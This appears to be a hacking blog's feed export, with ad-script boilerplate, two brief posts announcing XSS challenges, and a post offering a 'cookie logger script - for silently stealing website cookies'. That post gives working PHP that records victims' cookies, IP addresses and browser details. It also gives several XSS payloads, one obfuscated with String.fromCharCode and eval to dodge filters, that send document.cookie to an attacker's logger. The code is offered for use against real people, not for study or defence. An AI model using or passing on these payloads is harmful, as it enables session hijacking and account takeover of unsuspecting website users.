google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-75103159468960933462013-09-16T06:45:00.003-07:002013-12-21T14:41:15.842-08:00 r0ng's XSS Challenges - Challenge 2<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xHVoeb7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="http://i.imgur.com/xHVoeb7.png" width="400" /></a></div>
Try to solve these challenges and send me your solutions via the
comments (moderated), if you are correct I will add you to the solvers
list :).<br />
<br />
<br />
<a name='more'></a><b>Objective: </b>Alert your name with javascript!<br />
<br />
Link: <a href="http://dfu123.comule.com/xsschallenge2.php">http://dfu123.comule.com/xsschallenge2.php</a><br />
<br />
<u><b>Solvers:</b></u><br />
1. M.R.S.CO From Iranian Dark Coders Team<u><b> </b></u><br />
<br />
<a class="GHUY-LPOB" href="http://www.blogger.com/blogger.g?blogID=2511450483904536606#editor/target=post;postID=2559633920616282419;onPublishedMenu=posts;onClosedMenu=posts;postNum=1;src=postname"></a>
<a class="GHUY-LPOB" href="http://www.blogger.com/blogger.g?blogID=2511450483904536606#editor/target=post;postID=2559633920616282419;onPublishedMenu=posts;onClosedMenu=posts;postNum=1;src=postname"></a>
<a class="GHUY-LPOB" href="http://www.blogger.com/blogger.g?blogID=2511450483904536606#editor/target=post;postID=2559633920616282419;onPublishedMenu=posts;onClosedMenu=posts;postNum=1;src=postname"></a>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-25596339206162824192013-09-16T06:44:00.001-07:002013-09-17T07:50:14.056-07:00r0ng's XSS Challenges - Challenge 1<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ZEZU0pT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://i.imgur.com/ZEZU0pT.png" width="400" /></a></div>
<br />
Try to solve these challenges and send me your solutions via the comments (moderated), if you are correct I will add you to the solvers list :).<br />
<br />
<br />
<a name='more'></a> <br />
<b>Objective: </b>Alert your name with javascript!<br />
<br />
Link: <a href="http://dfu123.comule.com/xsschallenge1.php">http://dfu123.comule.com/xsschallenge1.php</a><br />
<br />
<u><b>Solvers:</b></u><br />
<br />
1. Codah<br />
2. HeliosGR
<br />
<br />
<br />
<br />
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-80108100348707155402013-08-11T16:54:00.003-07:002013-11-02T13:58:33.875-07:00r0ng's cookie logger script - for silently stealing website cookies<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uQPOB7Y.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://i.imgur.com/uQPOB7Y.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/zLj0QAn.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
For when you want to steal someone's session cookies but you don't want to raise the alarm!<br />
<br />
<br />
<a name='more'></a><br /><br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">What/why?</span></span><br />
<br />
Stealing cookies isn't complicated, but sometimes it can be tricky
depending on what is filtered from your JS injection. It can be made
much harder if your aim is to steal them silently without the person
knowing.<br />
<br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">The script</span></span><br />
<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<u><b>PHP Code:</b></u></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?</span><span style="color: #ffcccc;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #ffcccc;">//Check if cookie file exists, if not create it</span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;">if (!</span><span style="color: #66ccff;">file_exists</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"cookie.txt"</span><span style="color: #7ac07c;">)) {</span><span style="color: #66ccff;">file_put_contents</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"cookie.txt"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"<h1>r0ng's cookie logger</h1>"</span><span style="color: #7ac07c;">);<br />}</span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"> </span><span style="color: #ffcccc;">//Set cookie file variable</span><span style="color: #66ccff;"> </span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #66ccff;">$file </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">'cookie.txt'</span><span style="color: #7ac07c;">;</span><span style="color: #ffcccc;"> </span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #ffcccc;">//Check for password, display cookie file to admin</span><span style="color: #7ac07c;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;">if (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'pass'</span><span style="color: #7ac07c;">]) && </span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'pass'</span><span style="color: #7ac07c;">] == </span><span style="color: #ff99ff;">"r0ng"</span><span style="color: #7ac07c;">) {<br /><br />while (!</span><span style="color: #66ccff;">is_readable</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">)) {</span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"> </span><span style="color: #ffcccc;">//Wait for file permissions</span><span style="color: #7ac07c;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;">}</span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"><br />die(</span><span style="color: #ff99ff;">"<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">file_get_contents</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">) . </span><span style="color: #ff99ff;">"</table>"</span><span style="color: #7ac07c;">);<br />}</span><span style="color: #ffcccc;"> </span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #ffcccc;">//Derive victim's real ip</span><span style="color: #66ccff;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #66ccff;">$ipAddress </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'REMOTE_ADDR'</span><span style="color: #7ac07c;">];<br />if (</span><span style="color: #66ccff;">array_key_exists</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'HTTP_X_FORWARDED_FOR'</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">)) {<br /> </span><span style="color: #66ccff;">$ipAddress </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">array_pop</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">explode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">','</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'HTTP_X_FORWARDED_FOR'</span><span style="color: #7ac07c;">]));<br />}</span><span style="color: #ffcccc;"> </span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #ffcccc;">//cURL function for geo API calls<br /> </span><span style="color: #7ac07c;">function </span><span style="color: #66ccff;">get_content</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$URL</span><span style="color: #7ac07c;">){<br /> </span><span style="color: #66ccff;">$ch </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">curl_init</span><span style="color: #7ac07c;">();<br /> </span><span style="color: #66ccff;">curl_setopt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$ch</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">CURLOPT_RETURNTRANSFER</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">curl_setopt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$ch</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">CURLOPT_URL</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">$URL</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">$data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">curl_exec</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$ch</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">curl_close</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$ch</span><span style="color: #7ac07c;">);<br /> return </span><span style="color: #66ccff;">$data</span><span style="color: #7ac07c;">;<br /> }</span><span style="color: #ffcccc;"> </span></code></span><br />
<br />
<span style="background-color: black;"><code><span style="color: #ffcccc;">//Setting data variable with victim's info in table form</span><span style="color: #66ccff;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #66ccff;">$countryCode </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">get_content</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'http://api.wipmania.com/' </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">$ipAddress</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;">$data </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">"<tr><td><img src=http://www.geonames.org/flags/x/" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">strtolower</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$countryCode</span><span style="color: #7ac07c;">) . </span><span style="color: #ff99ff;">".gif width='100'></td><td>" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">$countryCode </span><span style="color: #7ac07c;">. </span><span style="color: #ff99ff;">"</td><td>" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">htmlspecialchars</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$ipAddress</span><span style="color: #7ac07c;">) . </span><span style="color: #ff99ff;">"</td><td>" </span><span style="color: #7ac07c;">. </span><span style="color: #66ccff;">htmlspecialchars</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'HTTP_USER_AGENT'</span><span style="color: #7ac07c;">]) . </span><span style="color: #ff99ff;">"</td><td>" </span><span style="color: #7ac07c;">. (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'cookie'</span><span style="color: #7ac07c;">]) ? </span><span style="color: #66ccff;">htmlspecialchars</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'cookie'</span><span style="color: #7ac07c;">]) :</span><span style="color: #ff99ff;">""</span><span style="color: #7ac07c;">) . </span><span style="color: #ff99ff;">"</td><td>" </span><span style="color: #7ac07c;">. (isset(</span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'HTTP_REFERER'</span><span style="color: #7ac07c;">]) ? </span><span style="color: #66ccff;">htmlspecialchars</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_SERVER</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'HTTP_REFERER'</span><span style="color: #7ac07c;">]) :</span><span style="color: #ff99ff;">""</span><span style="color: #7ac07c;">) . </span><span style="color: #ff99ff;">"</td><tr>"</span><span style="color: #7ac07c;">;<br /><br />while (!</span><span style="color: #66ccff;">is_writable</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">)) {</span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"> </span><span style="color: #ffcccc;">//Wait for file permissions</span><span style="color: #7ac07c;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;">}</span></code></span><br />
<span style="background-color: black;"><code><span style="color: #7ac07c;"><br /></span><span style="color: #ffcccc;">//Append data to file in new line</span><span style="color: #66ccff;"> </span></code></span><br />
<span style="background-color: black;"><code><span style="color: #66ccff;">file_put_contents</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$file</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">$data</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">FILE_APPEND</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;">?></span></code></span></div>
</div>
</div>
<br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">Tutorial</span></span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">a.) Setting it up:</span></span><br />
Upload that script to your webhost (logger.php).<br />
You access the admin panel with /logger.php?pass=r0ng<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">b.) JS injections:</span></span><br />
<br />
For most of the injections, we are taking advantage of the inherent
stealthiness of XMLHttpRequests. Same-domain restrictions only apply if
we need a response from our evil-site (which we don't).<br />
<br />
<span style="font-weight: bold;">1.) Quotes allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"get"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"http://yourevilsite.com/logger.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">();</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">2.) Apostrophe allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'get'</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'http://yourevilsite.com/logger.php?cookie=' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">();</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">3.) Quotes/apostraphe not allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>eval(</span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">118</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">114</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">61</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">119</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">88</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">77</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">76</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">72</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">82</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">113</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">115</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">44</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">104</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">58</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">102</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">49</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">50</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">51</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">108</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">108</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">114</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">104</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">63</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">107</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">105</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">61</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">43</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">107</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">105</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">115</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">));</span><span style="color: #66ccff;"></script></span> </code></span></div>
</div>
</div>
<span style="background-color: black;">
</span>
<span style="font-weight: bold;">Note 1:</span> Converting the above charcode array back to string would give: <br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'get'</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'http://yourevilsite.com/logger.php?cookie=' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">(); </span></code></span></div>
</div>
</div>
<span style="background-color: black;">
</span>
Here is a newbie friendly site to create charcodes: <a href="http://jdstiles.com/java/cct.html" target="_blank">http://jdstiles.com/java/cct.html</a><br />
<br />
<span style="font-weight: bold;">4.) Quotes/apostrophe not allowed but can reference external script:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">SCRIPT SRC</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">http</span><span style="color: #7ac07c;">:</span></span><span style="color: #ffcccc;"><span style="background-color: black;">//yourevilsite.com/evil.js></SCRIPT> </span></span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">Note 2:</span> Any of the other injections would be placed inside of the evil.js file (without javascript tags).<br />
<br />
<span style="font-weight: bold;">5.) Not enough space:</span><br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"//yourevilsite.com/logger.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">)</span><span style="color: #66ccff;"></script></span> </code></span></div>
</div>
</div>
<span style="background-color: black;">
</span>
<span style="font-weight: bold;">Note 3:</span> All of these are silent
other than number 5. If you need to use that, you can add a meta-refresh
redirect back to the referrer header, easily googleable if you don't
know how)<br />
<br />
<h4>
(If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
